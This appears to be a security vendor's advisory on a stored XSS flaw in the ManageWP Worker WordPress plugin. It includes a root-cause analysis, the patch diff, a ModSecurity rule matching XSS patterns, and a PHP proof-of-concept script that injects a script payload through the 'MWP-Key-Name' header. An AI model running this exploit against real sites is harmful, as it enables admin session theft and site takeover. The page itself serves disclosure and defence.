What is CVE-2026-3718?

CVE-2026-3718 is a high-severity vulnerability in the ManageWP Worker plugin for WordPress. It allows unauthenticated stored cross-site scripting (XSS) via the ‘MWP-Key-Name’ HTTP header, enabling attackers to inject malicious scripts that execute when an administrator visits the plugin’s connection management page.

Who is affected by this vulnerability?

All users of the ManageWP Worker plugin version 4.9.31 and earlier are affected by this vulnerability. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to ‘Plugins’, and look for the ManageWP Worker plugin. If the version is 4.9.31 or earlier, your site is at risk.

How can I fix CVE-2026-3718?

The vulnerability is patched in version 4.9.32 of the ManageWP Worker plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download and install the patched version.

What are the practical risks of this vulnerability?

The CVSS score for this vulnerability is 7.2, indicating a high severity level. Successful exploitation can lead to unauthorized script execution in the WordPress admin dashboard, potentially allowing attackers to hijack sessions or perform other malicious actions.

What does stored cross-site scripting mean?

Stored cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored on the server. These scripts are executed in the context of a user’s session when they access the affected page, posing significant security risks.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can send a crafted HTTP request with a malicious ‘MWP-Key-Name’ header to a ManageWP endpoint. This request triggers the storage of the unsanitized header value, which executes when an administrator views the debug connection page.

What steps can I take to mitigate the risk if I cannot update immediately?

If immediate updating is not possible, restrict access to the WordPress admin area and monitor for unauthorized access attempts. Additionally, consider implementing a web application firewall (WAF) to help filter out malicious requests.

What is the significance of the CVSS score?

The CVSS score of 7.2 indicates a high risk, meaning that the vulnerability can be exploited easily and has the potential for significant impact. Administrators should prioritize addressing vulnerabilities with high CVSS scores to protect their sites.

How does the vulnerability affect site security?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the admin dashboard, leading to session hijacking, site defacement, or unauthorized administrative access, thereby compromising the entire site.

What changes were made in the patched version?

The patched version 4.9.32 includes improvements in input sanitization and output escaping for the affected variables. This ensures that any attacker-controlled data is properly sanitized before being rendered in HTML, preventing XSS attacks.

What should I do if I experience an attack related to this vulnerability?

If you suspect an attack related to CVE-2026-3718, immediately update the plugin and review your site’s security logs for unauthorized access. Consider restoring from a clean backup and implementing additional security measures to prevent future incidents.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 13, 2026

CVE-2026-3718: ManageWP Worker <= 4.9.31 – Unauthenticated Stored Cross-Site Scripting via 'MWP-Key-Name' Header (worker)

CVE ID CVE-2026-3718

Plugin worker

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 4.9.31

Patched Version 4.9.32

Disclosed May 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3718:
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the ManageWP Worker plugin for WordPress, affecting all versions up to and including 4.9.31. An attacker can inject malicious scripts via the ‘MWP-Key-Name’ HTTP header, which are stored and executed when an administrator visits the plugin’s connection management page with debug parameters enabled. The CVSS score is 7.2 (High).

The root cause lies in the insufficient sanitization and output escaping of attacker-controlled header values. Specifically, in the file `worker/src/MWP/EventListener/MasterRequest/AuthenticateServiceRequest.php`, lines 56-62 and 85-88, the `$keyName` and `$algorithm` variables derived from the `MWP-Key-Name` and signature algorithm headers are directly concatenated into error messages without sanitization. These error messages are stored in the WordPress options table via `$this->context->optionSet(‘mwp_last_communication_error’, …)` on lines 61, 72, 80, and 96. Later, in `worker/src/MWP/EventListener/PublicRequest/AddConnectionKeyInfo.php`, line 418, the stored error message is retrieved with `$this->context->optionGet(‘mwp_last_communication_error’, ”)` and echoed directly into the HTML without escaping (no `esc_html()` call). This allows any unauthenticated attacker who can send a crafted `MWP-Key-Name` header to inject arbitrary HTML and JavaScript, which will execute in the context of the admin’s session when the connection management debug page is viewed.

An attacker can exploit this by sending a direct HTTP request to any endpoint handled by the AuthenticateServiceRequest event listener, such as a legitimate ManageWP worker API endpoint, while including a malicious `MWP-Key-Name` header. The payload, for example `alert(‘XSS’)`, is not sanitized. The plugin processes the request, fails authentication, and stores the unsanitized header value in the `mwp_last_communication_error` option. The attacker does not need any authentication, as the listener runs on every master request. To trigger execution, an administrator must visit the plugin’s debug connection page, typically accessed by appending `?worker_connections=1` to the plugins page URL (e.g., `/wp-admin/plugins.php?worker_connections=1`). The stored XSS payload then renders in the admin’s browser.

The patch introduces escaping on all output paths where the key name, algorithm, and hostname are displayed. In `AuthenticateServiceRequest.php`, the code now calls `sanitize_text_field()` on the algorithm and key name before concatenation, and `sanitize_text_field()` on the `HTTP_HOST` server variable. In `AddConnectionKeyInfo.php`, the patch adds `esc_html()` around the `mwp_last_communication_error` option output on line 418, and also applies `esc_html()` to the site ID output on line 347, `esc_url()` to the deactivation link on line 370, `esc_html()` to the `$refreshedKeys[‘message’]` on line 419, and `esc_html()` to the JSON-encoded public keys on lines 432 and 435. These changes ensure that any attacker-controlled data is encoded before being rendered in HTML, preventing script execution.

Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the WordPress admin dashboard. This can lead to session hijacking, defacement, redirection to malicious sites, or the creation of new administrative users if the admin has sufficient privileges. The attack requires social engineering to get the admin to view the debug page, but once viewed, the stored XSS payload runs with the admin’s privileges, enabling full site compromise.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/worker/init.php
+++ b/worker/init.php
@@ -3,7 +3,7 @@
 Plugin Name: ManageWP - Worker
 Plugin URI: https://managewp.com
 Description: We help you efficiently manage all your WordPress websites. <strong>Updates, backups, 1-click login, migrations, security</strong> and more, on one dashboard. This service comes in two versions: standalone <a href="https://managewp.com">ManageWP</a> service that focuses on website management, and <a href="https://godaddy.com/pro">GoDaddy Pro</a> that includes additional tools for hosting, client management, lead generation, and more.
-Version: 4.9.31
+Version: 4.9.32
 Author: GoDaddy
 Author URI: https://godaddy.com
 License: GPL2
@@ -575,8 +575,8 @@
         // reason (eg. the site can't ping itself). Handle that case early.
         register_activation_hook(__FILE__, 'mwp_activation_hook');

-        $GLOBALS['MMB_WORKER_VERSION']  = '4.9.31';
-        $GLOBALS['MMB_WORKER_REVISION'] = '2026-03-10 00:00:00';
+        $GLOBALS['MMB_WORKER_VERSION']  = '4.9.32';
+        $GLOBALS['MMB_WORKER_REVISION'] = '2026-03-18 00:00:00';

         // Ensure PHP version compatibility.
         if (version_compare(PHP_VERSION, '5.2', '<')) {
--- a/worker/src/MWP/Action/DownloadFile.php
+++ b/worker/src/MWP/Action/DownloadFile.php
@@ -16,8 +16,58 @@
     {
         $requestedFiles = $params['files'];

-        if (count($params['files']) > 1 || is_dir($requestedFiles[0])) {
-            $requestedFile = $this->archiveFiles($params['files']);
+        // Validate that every requested path sits within the WordPress installation
+        // root (ABSPATH). This prevents path traversal attacks where a crafted path
+        // like ../../etc/passwd could escape the intended directory boundary.
+        //
+        // We deliberately avoid realpath() for the boundary check because it follows
+        // symlinks, which would block legitimate sites that symlink directories outside
+        // ABSPATH (e.g. an uploads folder pointing to network storage). Instead we
+        // collapse . and .. via string operations only, preserving intentional symlinks.
+        // realpath() is still called afterwards, but only to verify the file exists —
+        // its resolved value is not used for the security comparison.
+        //
+        // DIRECTORY_SEPARATOR is appended to $allowedBase so that a sibling path like
+        // /var/www/html-other cannot pass a prefix check intended for /var/www/html.
+        $allowedBase = rtrim(ABSPATH, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
+
+        // Collect normalised paths so that all file operations below use the
+        // same values that were security-checked. Using the raw input after
+        // validation (validate-then-use-different-value) would be unsafe.
+        $normalisedFiles = array();
+        foreach ($requestedFiles as $filePath) {
+            // Make relative paths absolute so the boundary check works correctly.
+            if (!path_is_absolute($filePath)) {
+                $filePath = ABSPATH . $filePath;
+            }
+
+            // Collapse . and .. segments without following symlinks.
+            $parts      = explode('/', str_replace('\', '/', $filePath));
+            $normalised = array();
+            foreach ($parts as $part) {
+                if ($part === '..') {
+                    array_pop($normalised);
+                } elseif ($part !== '' && $part !== '.') {
+                    $normalised[] = $part;
+                }
+            }
+            $normalisedPath = DIRECTORY_SEPARATOR . implode(DIRECTORY_SEPARATOR, $normalised);
+
+            // Boundary check against the .. -clean path (symlinks left intact).
+            if (strpos($normalisedPath . DIRECTORY_SEPARATOR, $allowedBase) !== 0) {
+                return array('message' => self::DOWNLOAD_FAILED);
+            }
+
+            // Verify the file actually exists on disk.
+            if (realpath($filePath) === false) {
+                return array('message' => self::DOWNLOAD_FAILED);
+            }
+
+            $normalisedFiles[] = $normalisedPath;
+        }
+
+        if (count($normalisedFiles) > 1 || is_dir($normalisedFiles[0])) {
+            $requestedFile = $this->archiveFiles($requestedFiles);
         } else {
             $requestedFile = $requestedFiles[0];
         }
--- a/worker/src/MWP/Action/IncrementalBackup/ChecksumTables.php
+++ b/worker/src/MWP/Action/IncrementalBackup/ChecksumTables.php
@@ -13,7 +13,15 @@

     public function execute(array $params = array(), MWP_Worker_Request $request)
     {
-        $tables = array_map(array($this, 'escapeName'), $params['query']);
+        // escapeName() validates and escapes each table name. Filter out any
+        // names that fail validation (returns null) to avoid injecting nulls
+        // into the query.
+        $tables = array_filter(array_map(array($this, 'escapeName'), $params['query']));
+
+        if (empty($tables)) {
+            return $this->createResult(array('checksum' => array(), 'db' => $this->container->getWordPressContext()->getConstant('DB_NAME')));
+        }
+
         $query  = implode(',', $tables);

         $wpdb     = $this->container->getWordPressContext()->getDb();
@@ -29,6 +37,20 @@

     public function escapeName($tableName)
     {
-        return "`{$tableName}`";
+        // Validate that the table name contains only characters that are valid
+        // in MySQL identifiers: letters, digits, underscores, and dollar signs.
+        // Dots are intentionally excluded: wrapping "db.table" in a single pair
+        // of backticks produces the literal identifier `db.table` rather than
+        // the qualified `db`.`table` that MySQL expects. Callers always supply
+        // unqualified table names so dot support is not needed.
+        if (!preg_match('/^[a-zA-Z0-9_$]+$/', $tableName)) {
+            return null;
+        }
+
+        // Double any backtick characters within the name as per the MySQL
+        // standard for escaping identifier delimiters. This is defence-in-depth:
+        // the regex above already rejects backticks, but explicit escaping
+        // ensures safety if the validation rule is ever relaxed.
+        return '`' . str_replace('`', '``', $tableName) . '`';
     }
 }
--- a/worker/src/MWP/EventListener/MasterRequest/AuthenticateServiceRequest.php
+++ b/worker/src/MWP/EventListener/MasterRequest/AuthenticateServiceRequest.php
@@ -46,6 +46,8 @@
         }

         $algorithm = $request->getSignatureAlgorithm();
+        // Sanitize algorithm to prevent XSS when displayed in debug output
+        $sanitizedAlgorithm = sanitize_text_field($algorithm);

         if ($algorithm == 'SHA256') {
             $serviceSignature = $request->getServiceSignatureV2();
@@ -56,9 +58,11 @@
         }

         $keyName = $request->getKeyName();
+        // Sanitize key name to prevent XSS when displayed in debug output
+        $sanitizedKeyName = sanitize_text_field($keyName);

         if (empty($serviceSignature) || empty($keyName)) {
-            $this->context->optionSet('mwp_last_communication_error', 'Unexpected: service signature or key name are empty. Key name: '.$keyName.', Signature: '.$serviceSignature.', Algorithm: '.($algorithm ? $algorithm : 'SHA1'));
+            $this->context->optionSet('mwp_last_communication_error', 'Unexpected: service signature or key name are empty. Key name: '.$sanitizedKeyName.', Signature: '.$serviceSignature.', Algorithm: '.($sanitizedAlgorithm ? $sanitizedAlgorithm : 'SHA1'));
             return;
         }

@@ -67,7 +71,7 @@
         if (empty($publicKey)) {
             // for now do not throw an exception, just do not authenticate the request
             // later we should start throwing an exception here when this becomes the main communication method
-            $this->context->optionSet('mwp_last_communication_error', 'Could not find the appropriate communication key. Searched for: '.$keyName);
+            $this->context->optionSet('mwp_last_communication_error', 'Could not find the appropriate communication key. Searched for: '.$sanitizedKeyName);
             return;
         }

@@ -75,7 +79,7 @@
         $messageToCheck   = '';

         if (empty($communicationKey)) {
-            $this->context->optionSet('mwp_last_communication_error', 'Unexpected: communication key is empty. Key name: '.$keyName);
+            $this->context->optionSet('mwp_last_communication_error', 'Unexpected: communication key is empty. Key name: '.$sanitizedKeyName);
             return;
         }

@@ -88,7 +92,7 @@
         if (empty($messageToCheck)) {
             // for now do not throw an exception, just do not authenticate the request
             // later we should start throwing an exception here when this becomes the main communication method
-            $this->context->optionSet('mwp_last_communication_error', 'Unexpected: message to check is empty. Host: '.$request->server['HTTP_HOST']);
+            $this->context->optionSet('mwp_last_communication_error', 'Unexpected: message to check is empty. Host: '.sanitize_text_field($request->server['HTTP_HOST']));
             return;
         }

@@ -101,7 +105,7 @@
         if (!$verify) {
             // for now do not throw an exception, just do not authenticate the request
             // later we should start throwing an exception here when this becomes the main communication method
-            $this->context->optionSet('mwp_last_communication_error', 'Message signature invalid. Tried to verify: '.$messageToCheck.', Signature: '.base64_encode($serviceSignature));
+            $this->context->optionSet('mwp_last_communication_error', 'Message signature invalid. Tried to verify: '.base64_encode($messageToCheck).', Signature: '.base64_encode($serviceSignature));
             return;
         }

--- a/worker/src/MWP/EventListener/PublicRequest/AddConnectionKeyInfo.php
+++ b/worker/src/MWP/EventListener/PublicRequest/AddConnectionKeyInfo.php
@@ -344,7 +344,7 @@
                     $time = time();
                     foreach ($communicationKeys as $siteId => $communicationKey) { ?>
                         <tr>
-                            <td><?php echo $siteId !== 'any' ? $siteId : '*'; ?></td>
+                            <td><?php echo esc_html($siteId !== 'any' ? $siteId : '*'); ?></td>
                             <td><?php
                                 if ($communicationKey['added'] != null) {
                                     /** @handled function */
@@ -368,7 +368,7 @@
                                 } ?>
                             </td>
                             <td style="text-align: right">
-                                <a href="<?php echo $this->context->wpNonceUrl($this->context->getAdminUrl('plugins.php?worker_connections=1&action=mwp_deactivate_key&connection_id='.$siteId), 'mwp_deactivation_key', 'mwp_nonce'); ?>">
+                                <a href="<?php echo esc_url($this->context->wpNonceUrl($this->context->getAdminUrl('plugins.php?worker_connections=1&action=mwp_deactivate_key&connection_id='.urlencode($siteId)), 'mwp_deactivation_key', 'mwp_nonce')); ?>">
                                     <?php
                                     /** @handled function */
                                     echo esc_html__('Disconnect', 'worker'); ?>
@@ -410,21 +410,28 @@
                     if ($refreshedKeys['success'] === true) {
                         echo 'Keys successfully refreshed!';
                     } else {
-                        echo 'Keys were not successfully refreshed. Error: '.$refreshedKeys['message'];
+                        // Escape the error message before output to prevent XSS.
+                        // $refreshedKeys['message'] is built from raw OS/network data (e.g. PHP's
+                        // $errstr from stream_socket_client, DNS resolution strings, or server
+                        // response content) inside mwp_get_public_keys_from_live_fallback().
+                        // None of that input is sanitized at the source, so it must be escaped
+                        // here before being rendered into the admin page HTML.
+                        echo 'Keys were not successfully refreshed. Error: '.esc_html($refreshedKeys['message']);
                     } ?>
                 </p>
                 <p>
-                    <?php echo 'Last communication error: '.$this->context->optionGet('mwp_last_communication_error', '') ?>
+                    <?php echo 'Last communication error: '.esc_html($this->context->optionGet('mwp_last_communication_error', '')) ?>
                 </p>
                 <p><?php
                     /** @handled function */
                     echo esc_html__('Currently loaded keys:', 'worker'); ?>
                 </p>
                 <pre><?php
+                    $publicKeys = $this->context->optionGet('mwp_public_keys', null);
                     if (version_compare(PHP_VERSION, '5.4', '>=') && defined('JSON_PRETTY_PRINT')) {
-                        echo trim(json_encode($this->context->optionGet('mwp_public_keys', null), JSON_PRETTY_PRINT));
+                        echo esc_html(trim(json_encode($publicKeys, JSON_PRETTY_PRINT)));
                     } else {
-                        echo trim(json_encode($this->context->optionGet('mwp_public_keys', null)));
+                        echo esc_html(trim(json_encode($publicKeys)));
                     }
                     ?></pre>
                 <?php
--- a/worker/src/MWP/EventListener/PublicRequest/BrandContactSupport.php
+++ b/worker/src/MWP/EventListener/PublicRequest/BrandContactSupport.php
@@ -154,7 +154,21 @@
         <div id="mwp_support_dialog" style="display: none;">
             <?php if (!empty($contactText)): ?>
                 <div>
-                    <p><?php echo $contactText ?></p>
+                    <p><?php
+                        // $contactText is brand-provided and may contain links and basic
+                        // formatting. We use wp_kses() rather than esc_html() so that
+                        // legitimate markup (anchor tags, bold/italic, line breaks) is
+                        // preserved while any executable or dangerous elements are stripped.
+                        echo wp_kses($contactText, array(
+                            'a'      => array('href' => array(), 'target' => array(), 'rel' => array()),
+                            'b'      => array(),
+                            'strong' => array(),
+                            'em'     => array(),
+                            'i'      => array(),
+                            'br'     => array(),
+                            'span'   => array('class' => array()),
+                        ));
+                    ?></p>
                 </div>
             <?php endif ?>
             <?php if ($contactType == MWP_Worker_Brand::CONTACT_TYPE_TEXT_PLUS_FORM): ?>

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3718
# This rule blocks unauthenticated requests that contain a script tag pattern
# in the 'MWP-Key-Name' header, targeting the ManageWP Worker plugin.
# The rule matches when the header value contains XSS patterns like <script,<img,onerror,onload.
SecRule REQUEST_HEADERS:MWP-Key-Name "@rx <script|<img[^>]+onerror|<[^>]+onload|<svg[^>]+onload|javascript:|onerror=|onfocus=" 
  "id:20263718,phase:1,deny,status:403,msg:'CVE-2026-3718 XSS attempt via MWP-Key-Name header',severity:'CRITICAL',tag:'CVE-2026-3718'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3718 - ManageWP Worker <= 4.9.31 - Unauthenticated Stored Cross-Site Scripting via 'MWP-Key-Name' Header

// Set the target WordPress site URL
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress URL

// The malicious payload to be injected via the MWP-Key-Name header
// This payload will be stored and executed when an admin views the debug page
$payload = '<script>alert(document.cookie)</script>';

// Initialize cURL session
$ch = curl_init();

// Set the URL to a legitimate ManageWP worker endpoint.
// The 'mwp_worker_handshake' action is one of many possible endpoints that
// triggers the AuthenticateServiceRequest listener. We use this because it
// is a common, non-authenticated endpoint that will process the header.
$url = $target_url . '/?mwp_worker_handshake=1';

curl_setopt_array($ch, array(
    CURLOPT_URL => $url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => true,
    CURLOPT_HTTPHEADER => array(
        'MWP-Key-Name: ' . $payload  // Inject the XSS payload via the header
    ),
    CURLOPT_USERAGENT => 'AtomicEdge-PoC/1.0',
    CURLOPT_CONNECTTIMEOUT => 10,
    CURLOPT_TIMEOUT => 20,
    CURLOPT_SSL_VERIFYPEER => false,  // Disable SSL verification for testing
    CURLOPT_SSL_VERIFYHOST => false
));

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo '[!] cURL Error: ' . curl_error($ch) . "n";
    curl_close($ch);
    exit(1);
}

curl_close($ch);

// Provide instructions for verification
echo "[+] PoC for CVE-2026-3718 executed successfully.n";
echo "[+] Target URL: " . $url . "n";
echo "[+] HTTP Response Code: " . $http_code . "n";
echo "[+] Payload injected: " . $payload . "n";
echo "[+] The payload is now stored in the 'mwp_last_communication_error' option.n";
echo "[+] To trigger the XSS, an administrator must visit:n";
echo "[+] " . $target_url . "/wp-admin/plugins.php?worker_connections=1n";
echo "[+] Expected outcome: The JavaScript alert('document.cookie') will execute.n";

// Note: The request may return an authentication error or empty response,
// which is expected because the handshake will fail. The key is that the
// header value is processed and stored regardless of the response status.
?>

Frequently Asked Questions

What is CVE-2026-3718?
Understanding the Vulnerability
CVE-2026-3718 is a high-severity vulnerability in the ManageWP Worker plugin for WordPress. It allows unauthenticated stored cross-site scripting (XSS) via the ‘MWP-Key-Name’ HTTP header, enabling attackers to inject malicious scripts that execute when an administrator visits the plugin’s connection management page.
Who is affected by this vulnerability?
Identifying Vulnerable Versions
All users of the ManageWP Worker plugin version 4.9.31 and earlier are affected by this vulnerability. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying Plugin Version
To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to ‘Plugins’, and look for the ManageWP Worker plugin. If the version is 4.9.31 or earlier, your site is at risk.
How can I fix CVE-2026-3718?
Updating the Plugin
The vulnerability is patched in version 4.9.32 of the ManageWP Worker plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download and install the patched version.
What are the practical risks of this vulnerability?
Understanding the Severity
The CVSS score for this vulnerability is 7.2, indicating a high severity level. Successful exploitation can lead to unauthorized script execution in the WordPress admin dashboard, potentially allowing attackers to hijack sessions or perform other malicious actions.
What does stored cross-site scripting mean?
Explaining XSS Types
Stored cross-site scripting (XSS) occurs when an attacker injects malicious scripts into a web application, which are then stored on the server. These scripts are executed in the context of a user’s session when they access the affected page, posing significant security risks.
How does the proof of concept demonstrate the vulnerability?
Understanding the Exploit
The proof of concept shows how an attacker can send a crafted HTTP request with a malicious ‘MWP-Key-Name’ header to a ManageWP endpoint. This request triggers the storage of the unsanitized header value, which executes when an administrator views the debug connection page.
What steps can I take to mitigate the risk if I cannot update immediately?
Temporary Mitigation Strategies
If immediate updating is not possible, restrict access to the WordPress admin area and monitor for unauthorized access attempts. Additionally, consider implementing a web application firewall (WAF) to help filter out malicious requests.
What is the significance of the CVSS score?
Interpreting the CVSS Score
The CVSS score of 7.2 indicates a high risk, meaning that the vulnerability can be exploited easily and has the potential for significant impact. Administrators should prioritize addressing vulnerabilities with high CVSS scores to protect their sites.
How does the vulnerability affect site security?
Potential Consequences of Exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the admin dashboard, leading to session hijacking, site defacement, or unauthorized administrative access, thereby compromising the entire site.
What changes were made in the patched version?
Details of the Patch
The patched version 4.9.32 includes improvements in input sanitization and output escaping for the affected variables. This ensures that any attacker-controlled data is properly sanitized before being rendered in HTML, preventing XSS attacks.
What should I do if I experience an attack related to this vulnerability?
Responding to Security Incidents
If you suspect an attack related to CVE-2026-3718, immediately update the plugin and review your site’s security logs for unauthorized access. Consider restoring from a clean backup and implementing additional security measures to prevent future incidents.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations